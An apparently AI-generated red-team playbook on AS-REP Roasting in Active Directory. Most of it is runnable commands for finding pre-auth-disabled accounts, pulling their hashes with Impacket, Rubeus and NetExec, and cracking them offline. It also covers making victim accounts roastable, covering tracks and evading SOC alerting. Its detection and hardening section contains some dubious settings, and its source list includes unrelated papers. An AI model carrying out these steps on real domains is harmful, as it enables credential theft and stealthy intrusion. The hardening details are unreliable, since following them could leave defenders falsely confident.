attack-3-as-rep-roasting.md (22153B)
1 --- 2 title: "Attack #3 β AS-REP Roasting" 3 description: "AS-REP Roasting targets Active Directory accounts that have the \"Do not require Kerberos preauthentication\" flag set (DONT_REQ_PREAUTH). Under normalβ¦" 4 category: active-directory 5 subcategory: "Credential Access" 6 tags: ["active-directory", "kerberos", "hashing"] 7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "BloodHound"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-One/π΄ Attack #3 β AS-REP Roasting.md" 11 --- 12 # π΄ Attack #3 β AS-REP Roasting 13 14 *** 15 16 ## π How It Works 17 18 AS-REP Roasting targets Active Directory accounts that have the **"Do not require Kerberos preauthentication"** flag set (`DONT_REQ_PREAUTH`). Under normal Kerberos operation, a user must prove knowledge of their password by encrypting a timestamp and sending it in an AS-REQ β the KDC verifies this before issuing a TGT. When pre-authentication is disabled, however, the KDC skips that verification entirely and **immediately returns an AS-REP containing a blob encrypted with the user's password hash** β with zero proof of identity from the requester. 19 20 The attacker simply sends an unauthenticated AS-REQ for the target username, receives the AS-REP, rips out the encrypted section (`$krb5asrep$23$...`), and cracks it offline. The critical distinction from Kerberoasting is that **no valid credentials are required at all** to request the hash β making this a viable first-foothold attack rather than just a post-compromise technique. 21 22 > β οΈ **Windows Server 2022+ Behaviour:** Server 2022 and newer domains enforce stricter Kerberos policies by default. DONT_REQ_PREAUTH on user accounts is now rare in well-maintained domains, but service accounts still frequently have pre-auth disabled. Also, if AES-256 encryption is enforced (not RC4), the hash difficulty increases significantly β but most environments still default to RC4 for compatibility. GetNPUsers.py will request both etype 23 (RC4) and etype 18 (AES-256); always prioritize cracking the RC4 hash if available. 23 24 **Chains with:** Attack #1 (user enumeration with Kerbrute feeds usernames directly into AS-REP), Attack #6 (ACL abuse to set DONT_REQ_PREAUTH on target accounts) 25 26 ### The Full Attack Flow 27 28 ``` 29 1. Enumerate domain for accounts with DONT_REQ_PREAUTH flag set 30 (via LDAP query β attribute: userAccountControl bit 0x400000) 31 2. Send unauthenticated AS-REQ to the KDC (port 88) for each vulnerable account 32 3. KDC responds with AS-REP β no credential verification performed 33 4. Extract encrypted blob from AS-REP ($krb5asrep$23$...) 34 5. Crack offline with Hashcat (mode 18200) or John the Ripper 35 6. Recover plaintext password β authenticate as target account 36 ``` 37 38 ### Kerberoasting vs AS-REP Roasting β Key Differences 39 40 | Property | Kerberoasting | AS-REP Roasting | 41 |---|---|---| 42 | **Credentials needed** | Any valid domain user | **None required** (can be unauthenticated) | 43 | **What you request** | TGS ticket (service ticket) | AS-REP (TGT response) | 44 | **Target accounts** | Accounts with SPNs set | Accounts with pre-auth disabled | 45 | **Hash format** | `$krb5tgs$23$...` | `$krb5asrep$23$...` | 46 | **Hashcat mode** | 13100 (RC4) | **18200** | 47 | **Prevalence** | Very common | Less common but devastating | 48 49 *** 50 51 ## βοΈ Prerequisites 52 53 | Requirement | Detail | 54 |---|---| 55 | **Network access to DC** | Port 88 (Kerberos) reachable β that's it for the unauthenticated variant | 56 | **Valid domain user (optional)** | Only needed for LDAP enumeration of vulnerable accounts | 57 | **Target accounts** | Accounts with `DONT_REQ_PREAUTH` flag set in `userAccountControl` | 58 | **Offline cracking rig** | GPU-accelerated Hashcat preferred; hash is RC4 by default (fast to crack) | 59 60 *** 61 62 ## π οΈ Tools 63 64 | Tool | Platform | Notes | 65 |---|---|---| 66 | **Impacket β GetNPUsers.py** | Linux | Primary Linux tool; supports unauthenticated + authenticated modes | 67 | **Rubeus** | Windows | Best Windows tool; auto-discovers and roasts all vulnerable accounts | 68 | **Kerbrute** | Linux | Can perform AS-REP roasting during user enumeration pass | 69 | **PowerView β Get-DomainUser** | Windows | Enumerate `DONT_REQ_PREAUTH` accounts via LDAP | 70 | **BloodHound** | Both | Flags AS-REP roastable accounts; shows attack path | 71 | **NetExec / CrackMapExec** | Linux | LDAP module can enumerate and dump AS-REP hashes | 72 | **Hashcat** | Linux/Windows | Mode `18200` for AS-REP hashes | 73 | **John the Ripper** | Linux | `krb5asrep` format; CPU-based alternative | 74 | **bloodyAD** | Linux | LDAP framework; can set DONT_REQ_PREAUTH on accounts you control | 75 76 *** 77 78 ## π» Full Commands 79 80 ### π΅ Step 0 β Enumerate Accounts with Pre-Auth Disabled 81 82 ```bash 83 # Linux β LDAP query (unauthenticated or authenticated) 84 ldapsearch -x -H ldap://10.10.10.10 -D "corp\low_user" -w 'Password1' \ 85 -b "DC=corp,DC=local" \ 86 "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \ 87 sAMAccountName 88 ``` 89 90 ```powershell 91 # Windows β PowerShell with AD module 92 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth | \ 93 Select-Object SamAccountName, DistinguishedName 94 95 # Windows β PowerView 96 Import-Module .\PowerView.ps1 97 Get-DomainUser -PreauthNotRequired | Select-Object SamAccountName, Description, MemberOf 98 99 # Windows β LDAP query with ADSearch 100 ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \ 101 --attributes cn,distinguishedname,samaccountname 102 ``` 103 104 *** 105 106 ### π΄ Impacket β GetNPUsers.py (Linux β Primary Tool) 107 108 ```bash 109 # Unauthenticated β brute-force userlist (no creds needed, just usernames) 110 GetNPUsers.py corp.local/ -no-pass -usersfile valid_users.txt -dc-ip 10.10.10.10 111 112 # Unauthenticated β single target account 113 GetNPUsers.py corp.local/svc_backup -no-pass -dc-ip 10.10.10.10 114 115 # Authenticated β auto-enumerate ALL vulnerable accounts from domain (best method) 116 GetNPUsers.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request 117 118 # Authenticated β dump all hashes to file 119 GetNPUsers.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request \ 120 -outputfile asrep_hashes.txt -format hashcat 121 122 # Authenticated β John format output 123 GetNPUsers.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 -request \ 124 -outputfile asrep_hashes.txt -format john 125 126 # Using NTLM hash (no plaintext password needed) 127 GetNPUsers.py corp.local/low_user -hashes :a87f3a337d73085c45f9416be5787d86 \ 128 -dc-ip 10.10.10.10 -request 129 ``` 130 131 > **Hash format you'll see:** `$krb5asrep$23$victim@corp.local:1a2b3c4d...` β `23` = RC4 encryption β fast to crack with Hashcat mode 18200. 132 133 *** 134 135 ### π΄ Rubeus β Windows (Most Powerful) 136 137 ```powershell 138 # Roast ALL accounts with pre-auth disabled (auto-discovery) 139 .\Rubeus.exe asreproast 140 141 # Output in Hashcat format to file 142 .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast 143 144 # Target a single specific user 145 .\Rubeus.exe asreproast /user:svc_backup /format:hashcat /outfile:svc_backup.hash 146 147 # No-wrap output (prevents base64 line-break corruption) 148 .\Rubeus.exe asreproast /format:hashcat /nowrap 149 150 # From an existing TGT (avoids new auth event) 151 .\Rubeus.exe asreproast /ticket:<base64_TGT> /format:hashcat 152 153 # Enumerate only β list vulnerable accounts without requesting hashes 154 .\Rubeus.exe asreproast /stats 155 ``` 156 157 *** 158 159 ### π΄ Kerbrute β Linux (Unauthenticated, Combining Enum + Roast) 160 161 ```bash 162 # Standard user enumeration (will flag pre-auth disabled accounts automatically) 163 kerbrute userenum -d corp.local --dc 10.10.10.10 /usr/share/wordlists/users.txt 164 165 # Note: Kerbrute flags accounts responding without pre-auth during enumeration 166 # Use GetNPUsers.py to request the actual hashes from those accounts 167 ``` 168 169 *** 170 171 ### π΄ NetExec β Linux (Quick Authenticated Sweep) 172 173 ```bash 174 # Enumerate and dump AS-REP hashes via LDAP 175 nxc ldap 10.10.10.10 -u low_user -p 'Password1' --asreproast asrep_hashes.txt 176 177 # Using Kerberos ticket (ccache) 178 export KRB5CCNAME=/tmp/low_user.ccache 179 nxc ldap 10.10.10.10 --use-kcache --asreproast asrep_hashes.txt 180 ``` 181 182 *** 183 184 ### π΄ PowerView β Manual Enumeration + Roasting (Windows) 185 186 ```powershell 187 Import-Module .\PowerView.ps1 188 189 # Enumerate all DONT_REQ_PREAUTH accounts 190 Get-DomainUser -PreauthNotRequired -Properties SamAccountName, Description, MemberOf 191 192 # Check if a specific user has pre-auth disabled 193 Get-DomainUser -Identity svc_backup -Properties DoesNotRequirePreAuth 194 195 # Enable DONT_REQ_PREAUTH on an account you control (if you have GenericWrite) 196 # This lets you roast accounts you've targeted via ACL abuse 197 Set-DomainObject -Identity target_user -XOR @{userAccountControl=4194304} -Verbose 198 ``` 199 200 > β οΈ **Advanced Technique:** If you have `GenericWrite` over a user account (from ACL abuse), you can **set** `DONT_REQ_PREAUTH` on that account yourself, making it AS-REP roastable on demand, then crack the hash. This bridges ACL abuse (Category 3) directly into credential theft. 201 202 *** 203 204 ### π΄ bloodyAD β Set DONT_REQ_PREAUTH via LDAP (Linux) 205 206 ```bash 207 # Set DONT_REQ_PREAUTH on a user you have write access to 208 bloodyAD --host 10.10.10.10 -u 'corp.local\low_user' -p 'Password1' \ 209 set object target_user userAccountControl 4194304 210 211 # Unset DONT_REQ_PREAUTH to cover tracks (change 4194304 back to 512) 212 bloodyAD --host 10.10.10.10 -u 'corp.local\low_user' -p 'Password1' \ 213 set object target_user userAccountControl 512 214 215 # Note: userAccountControl values β 512 = normal user, +4194304 = DONT_REQ_PREAUTH 216 ``` 217 218 *** 219 220 ### π΄ ldapmodify β LDAP Modify (Linux Alternative) 221 222 ```bash 223 # Create LDIF file to set DONT_REQ_PREAUTH 224 cat > modify.ldif << 'EOF' 225 dn: CN=target_user,CN=Users,DC=corp,DC=local 226 changetype: modify 227 replace: userAccountControl 228 userAccountControl: 4194304 229 EOF 230 231 # Apply the modification (requires LDAP write access) 232 ldapmodify -x -D "CN=low_user,CN=Users,DC=corp,DC=local" -w 'Password1' \ 233 -H ldap://10.10.10.10 -f modify.ldif 234 ``` 235 236 *** 237 238 ### π΄ Offline Cracking β Hashcat 239 240 ```bash 241 # AS-REP hash cracking β mode 18200 (RC4-HMAC / krb5asrep) 242 hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt 243 244 # With best64 rules (strong coverage for corporate passwords) 245 hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt \ 246 -r /usr/share/hashcat/rules/best64.rule 247 248 # With d3ad0ne rules (aggressive, higher coverage) 249 hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt \ 250 -r /usr/share/hashcat/rules/d3ad0ne.rule 251 252 # Combination attack β wordlist + mask (corporate format: Word+Year+Symbol) 253 hashcat -m 18200 asrep_hashes.txt -a 6 /usr/share/wordlists/rockyou.txt '?d?d?d?s' 254 255 # Brute-force mask for short passwords (8 chars, mixed case + digit + symbol) 256 hashcat -m 18200 asrep_hashes.txt -a 3 ?u?l?l?l?l?d?d?s 257 258 # John the Ripper alternative 259 john --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt asrep_hashes.txt 260 john --format=krb5asrep asrep_hashes.txt --show 261 ``` 262 263 *** 264 265 ## π§© Troubleshooting 266 267 | Error | Cause | Fix | 268 |---|---|---| 269 | **`KDC_ERR_PREAUTH_REQUIRED`** | Target account actually requires pre-auth (flag check failed). | Re-verify the account's `userAccountControl` value β may have been set to require pre-auth since enumeration. Try a different account from your list. | 270 | **`KDC_ERR_CLIENT_NAME_MISMATCH`** | Username doesn't exist in domain or typo in domain name. | Verify username spelling. Check domain FQDN matches domain controller. Run Kerbrute to confirm user exists. | 271 | **`Socket timeout / No response from KDC`** | Port 88 filtered or KDC unreachable. | Verify network connectivity to DC on port 88 (`nc -zv 10.10.10.10 88`). Check firewall rules. Confirm DC IP is correct. | 272 | **Hash cracking fails (no plaintext found)** | Password not in wordlist or incorrect ruleset. | Try larger wordlists (SecLists, CrunchBase). Add context-specific rules (company name, keywords). Use mask attacks with common patterns (?d?d?d, ?s?s). | 273 | **`Traceback: imaplib module not found`** or similar Python errors | Missing dependencies in Impacket installation. | Reinstall Impacket: `pip install impacket --upgrade`. Ensure you're using Python 3.9+ (`python3 --version`). | 274 | **NTLM hash cracking starts but is very slow** | Wordlist is too large or no GPU acceleration. | Use Hashcat with GPU: `hashcat -m 18200 -d 1` (device 1 = GPU). Reduce wordlist size or use rules instead of full wordlist. | 275 | **`Rubeus reports "0 accounts to roast"`** | No accounts found with DONT_REQ_PREAUTH in domain. | The domain may enforce pre-auth strictly. Check service accounts specifically β they are more likely to be misconfigured. Verify your user has domain recon permissions. | 276 | **`GetNPUsers.py returns blank hashes (empty encryption data)`** | Account exists but has no password set (disabled account or computer account). | Filter out disabled accounts and computer accounts from enumeration (`objectClass=user` and NOT `(objectClass=computer)`). Focus on active user accounts only. | 277 278 *** 279 280 ## π― OPSEC Tips 281 282 ### OpSec Ranking (Stealthiest to Loudest) 283 284 1. **Unauthenticated AS-REP per-username** (stealthiest) β single 4768 event per user, easily lost in noise 285 2. **GetNPUsers.py authenticated (with valid account)** β blends with normal LDAP traffic 286 3. **Rubeus on domain-joined machine** β local execution, minimal network footprint if run in memory 287 4. **PowerView enumeration from workstation** β moderate LDAP activity, risk if SOC monitors bulk LDAP queries 288 5. **NetExec subnet spray** (loudest) β multiple 4768 events across many hosts in quick succession, clear detection pattern 289 290 ### Modern Defence Impact 291 292 - **Kerberos Armoring (FAST)** β when enabled, forces pre-auth even on DONT_REQ_PREAUTH accounts. Modern domains with Kerberos hardening render this attack impossible. 293 - **Event 4768 alerting** β if SOC alerts on `PreAuthType: 0`, each target is immediately detected. Use light enumeration; avoid spraying 20+ accounts in one session. 294 - **Sysmon + SIEM** β credential dumping (Mimikatz) on the same box where you enumerate is risky. Separate enumeration from cracking phases geographically. 295 296 ### Opsec Best Practices 297 298 - **No credentials = less footprint** β the unauthenticated variant leaves only a Kerberos AS-REQ event, not an LDAP bind 299 - **Use `/nowrap` in Rubeus** β avoids hash corruption from line wrapping in terminal logs 300 - **Target high-value accounts first** β look for admin, svc_, backup, or service in the username 301 - **AS-REP roast BEFORE password spraying** β it's entirely passive and leaves minimal artefacts 302 - **Combine with GenericWrite abuse** β if you have write access to a user object, set `DONT_REQ_PREAUTH` temporarily, roast it, then unset the flag to cover tracks 303 - **Avoid mass enumeration over LDAP** β the unauthenticated AS-REQ method per-username is stealthier than a bulk LDAP query listing all pre-auth disabled accounts 304 305 *** 306 307 ## π‘οΈ Detection β Event IDs 308 309 | Event ID | Source | What to Look For | 310 |---|---|---| 311 | **4768** | Security Log | AS-REQ sent β **`PreAuthType = 0`** (no pre-auth) is the smoking gun | 312 | **4768** | Security Log | Multiple 4768 events from a **single IP** for **different usernames** in a short window | 313 | **4625** | Security Log | Failed logon shortly after β attacker testing cracked credentials | 314 | **4723 / 4724** | Security Log | Password change on roasted account β attacker using recovered credentials | 315 | **LDAP query logs** | DC Diagnostic | Bulk query for `userAccountControl` with bit `4194304` set | 316 317 **Primary detection signature:** Event 4768 with `PreAuthType: 0` is the clearest indicator. In a well-configured domain, this should essentially never appear during normal operations. A single occurrence warrants investigation; multiple in quick succession from one source IP is near-certain AS-REP Roasting in progress. 318 319 ### Additional Sysmon Event IDs 320 321 | Event ID | Detection | 322 |---|---| 323 | **Sysmon 3** | Network connection to port 88 (Kerberos) from unusual process (GetNPUsers, Rubeus wrapper) | 324 | **Sysmon 22** | DNS query for `_kerberos._tcp.dc._msdcs.corp.local` β DC discovery before roasting | 325 326 ### Sigma Rule References 327 328 - **Sigma rule:** `detection_asreproast_multiple_users` β flags multiple AS-REQ without pre-auth from same source IP 329 - **Sigma rule:** `dns_kerberos_discovery` β detects SRV record queries for Kerberos before enumeration 330 - Link: https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_asreproast.yml 331 332 ### EDR Detections 333 334 - **Microsoft Defender for Identity:** AS-REP Roasting detection (suspicious Kerberos activity) β alerts when GetNPUsers or Rubeus detected 335 - **CrowdStrike Falcon:** Detects Rubeus execution via behavioral analysis (keyword matching in command line) 336 - **Elastic Security:** Hunt rule `credential_access_asreproast_kerberos` β monitors for unauthenticated Kerberos requests 337 - **Sysmon + SIEM correlations:** LSASS access + Kerberos port 88 activity in sequence = credential theft chain 338 339 ### Hardening Commands 340 341 ```powershell 342 # Enable Kerberos Armoring (FAST) β forces pre-auth even when disabled 343 # (Domain-wide GPO setting, Server 2012 R2+ required) 344 Set-GPRegistryValue -Name "Default Domain Policy" \ 345 -Key "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Kerberos\Parameters" \ 346 -ValueName "ForceStartupDCQuery" -Type DWord -Value 1 347 348 # Disable DONT_REQ_PREAUTH on all user accounts (remediation) 349 # Find all accounts with pre-auth disabled: 350 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | ForEach-Object { 351 Set-ADUser -Identity $_ -DoesNotRequirePreAuth $false 352 } 353 354 # Enable pre-auth requirement via Group Policy 355 # (GPO path: Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options) 356 # Setting: "Network security: Force Kerberos Pre-Authentication" = Enabled 357 358 # Monitor for suspicious LDAP queries on DC (Event Log) 359 Get-WinEvent -FilterHashtable @{ 360 LogName = 'Directory Service' 361 ID = 4662 362 } -MaxEvents 100 | Where-Object { $_.Properties[6] -match "4194304" } 363 ``` 364 365 *** 366 367 ## πΊοΈ MITRE ATT&CK 368 369 | Tactic | Technique ID | Sub-technique | Observed in | Platforms | Data Sources | 370 |---|---|---|---|---|---| 371 | Credential Access | T1558 | **004** (AS-REP) | APT1, APT28, APT29, Wizard Spider | Windows | Authentication logs (4768), Process creation (Sysmon 1), Network traffic (Kerberos port 88) | 372 373 **T1558.004 β Steal or Forge Kerberos Tickets: AS-REP Roasting** β Specifically targets the AS-REP response from KDC when pre-authentication is disabled. Leads to offline password cracking without needing valid credentials. 374 375 *** 376 377 ## π Attack Chain Context 378 379 ``` 380 [AS-REP Roasting] βββ Plaintext Password Recovered (no prior creds needed) 381 β 382 ββββ π First foothold β use recovered creds to authenticate to domain 383 ββββ π BloodHound enumeration with recovered account 384 ββββ π« Kerberoasting (pivot to SPN accounts from new foothold) 385 ββββ π Access shares, emails, web apps with service account creds 386 ββββ π GenericWrite β SET DONT_REQ_PREAUTH on other accounts 387 ββββ π― If roasted account is in high-priv group β direct escalation path 388 ``` 389 390 **What makes this dangerous as an initial attack:** Unlike Kerberoasting, AS-REP Roasting requires **zero credentials to pull hashes** β just a username list and network access to port 88. Combined with Kerbrute user enumeration (Attack #1 recon phase), an attacker can go from **zero knowledge β valid domain credentials** with no lockout risk whatsoever, as each account is only queried once. 391 392 *** 393 394 > β **Attack #3 β AS-REP Roasting complete.** Tell me to move on when you're ready for **Attack #4 β Pass-the-Hash (PtH)**. 395 396 Sources 397 AS-REP Roasting Attack - How It Works and Defense Strategies https://netwrix.com/en/cybersecurity-glossary/cyber-security-attacks/as-rep-roasting/ 398 AS-REP Roasting Attack Explained - MITRE ATT&CK T1558.004 https://www.picussecurity.com/resource/blog/as-rep-roasting-attack-explained-mitre-attack-t1558.004 399 AS-REP Roasting - Penetration Testing Lab https://pentestlab.blog/2024/02/20/as-rep-roasting/ 400 What is AS-REP Roasting? | Semperis Identity Attack Catalog https://www.semperis.com/blog/as-rep-roasting-explained/ 401 AD Recon β AS-REP Roasting Attacks - Active Directory Attack https://juggernaut-sec.com/as-rep-roasting/ 402 The Silent Threat in Active Directory: How AS-REP Roasting Steals ... https://www.trellix.com/blogs/research/the-silent-threat-in-active-directory/ 403 AS-REP roasting detection https://www.hackthebox.com/blog/as-rep-roasting-detection 404 Zipper Stack: Shadow Stacks Without Shadow https://arxiv.org/pdf/1902.00888.pdf 405 Oreo: Protecting ASLR Against Microarchitectural Attacks (Extended Version) http://arxiv.org/pdf/2412.07135.pdf 406 Security Mitigations for Return-Oriented Programming Attacks https://arxiv.org/pdf/1008.4099.pdf 407 Attacking Recommender Systems with Augmented User Profiles https://arxiv.org/pdf/2005.08164.pdf 408 Data-Free Hard-Label Robustness Stealing Attack https://arxiv.org/pdf/2312.05924.pdf 409 ROPNN: Detection of ROP Payloads Using Deep Neural Networks https://arxiv.org/pdf/1807.11110.pdf 410 Adversarial Attacks on Both Face Recognition and Face Anti-spoofing Models https://arxiv.org/html/2405.16940v1 411 VANET Routing Replay Attack Detection Research Based on SVM https://www.matec-conferences.org/articles/matecconf/pdf/2016/26/matecconf_mmme2016_05020.pdf 412 What is AS-REP Roasting? https://jumpcloud.com/it-index/what-is-as-rep-roasting 413 AS-REP Roasting Attack Explained | Real-Life Active Directory Exploit ... https://www.youtube.com/watch?v=zl0v5lYSNlQ 414 InternalAllTheThings/docs/active-directory/ad-roasting-asrep.md at main Β· swisskyrepo/InternalAllTheThings https://github.com/swisskyrepo/InternalAllTheThings/blob/main/docs/active-directory/ad-roasting-asrep.md 415 AS-REP Roasting: Exploiting Kerberos for Password Hashes https://redbotsecurity.com/as-rep-roasting/ 416 Cracking Active Directory Passwords with AS-REP Roasting https://netwrix.com/en/resources/blog/cracking_ad_password_with_as_rep_roasting/